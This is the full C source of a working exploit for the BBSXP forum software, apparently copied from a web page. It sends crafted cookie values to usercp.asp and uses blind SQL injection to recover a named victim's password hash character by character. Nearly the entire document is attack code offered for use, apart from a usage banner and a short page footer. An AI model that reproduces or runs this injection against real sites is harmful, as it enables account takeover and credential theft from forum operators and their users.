BBSXP setup.asp top function injection exploit
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
void help(char *program)
{
printf("\r\n");
printf("BBSXP setup.asp top function injection exploit\r\n");
printf(" Originally discovered by Qiyejia\r\n");
printf("==============================================\r\n\r\n");
printf("Usage: %s <Host> <Path> <Yourname> <Yourpass> <Victim>\r\n",program);
return;
}
char Var1[]="GET "; //2
char Var2[]="/usercp.asp HTTP/1.1\r\n"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/msword, application/vnd.ms-excel, */*\r\n"
"Accept-Language: zh-cn\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
"Host: ";//1
char Var3[]="\r\n"
"Connection: Keep-Alive\r\n"
"Cookie: eremite=0; userpass=";//4
char Var4[]="; username=";//3
char Var5[]="%27+and+1%3d%28select+count%28%2A%29+from+%5Buser%5D+where+username%3d%27";//5
char Var6[]="%27+and+right%28left%28userpass%2c";//num
char Var7[]="%29%2c1%29%3d%27";//var
char Var8[]="%27%29+and+userpass%3C%3E%27\r\n\r\n";
char dict[]="01234567890ABCDEF";
void main(int argc, char *argv[])
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int nTimeout = 3000;
if(argc!=6)
{
help(argv[0]);
return;
}
if(WSAStartup(0x0101,&wsaData)!=0)
{
printf("error starting winsock..");
return;
}
if((he = gethostbyname(argv[1]))==0)
{
printf("Failed resolving '%s'",argv[1]);
return;
}
host.sin_port = htons(80);
host.sin_family = AF_INET;
host.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("Failed creating socket");
return;
}
char Head[5000] = {0}, buff[5000] = {0}, Packet[5000] = {0}, tmp[5] = {0};
strcpy(Head, Var1);
strcat(Head, argv[2]);
strcat(Head, Var2);
strcat(Head, argv[1]);
strcat(Head, Var3);
strcat(Head, argv[4]);
strcat(Head, Var4);
strcat(Head, argv[3]);
strcat(Head, Var5);
strcat(Head, argv[5]);
strcat(Head, Var6);
printf("Trying User %s \r\n",argv[5]);
for (int len = 1; len < 33; len++)
for (int i = 0; i < strlen(dict); i++)
{
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("Failed creating socket");
return;
}
if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1)
{
printf("Failed connecting to host\r\n");
return;
}
setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char*)&nTimeout,sizeof(nTimeout));
memset(tmp, 0, sizeof(tmp));
tmp[0] = '0' + len / 10;
tmp[1] = '0' + len % 10;
strcpy(Packet, Head);
strcat(Packet, tmp);
strcat(Packet, Var7);
memset(tmp, 0, sizeof(tmp));
tmp[0] = dict[i];
strcat(Packet, tmp);
strcat(Packet, Var8);
send(s, Packet, strlen(Packet), 0);
//Sleep(500);
recv(s, buff, sizeof(buff), 0);
if(strstr(buff, "Set-Cookie: username=;"))
{
//Sleep(500);
}
else
{
printf("%c", dict[i]);
//printf(buff);
closesocket(s);
break;
}
closesocket(s);
}
return;
}
推荐
评论(0条)
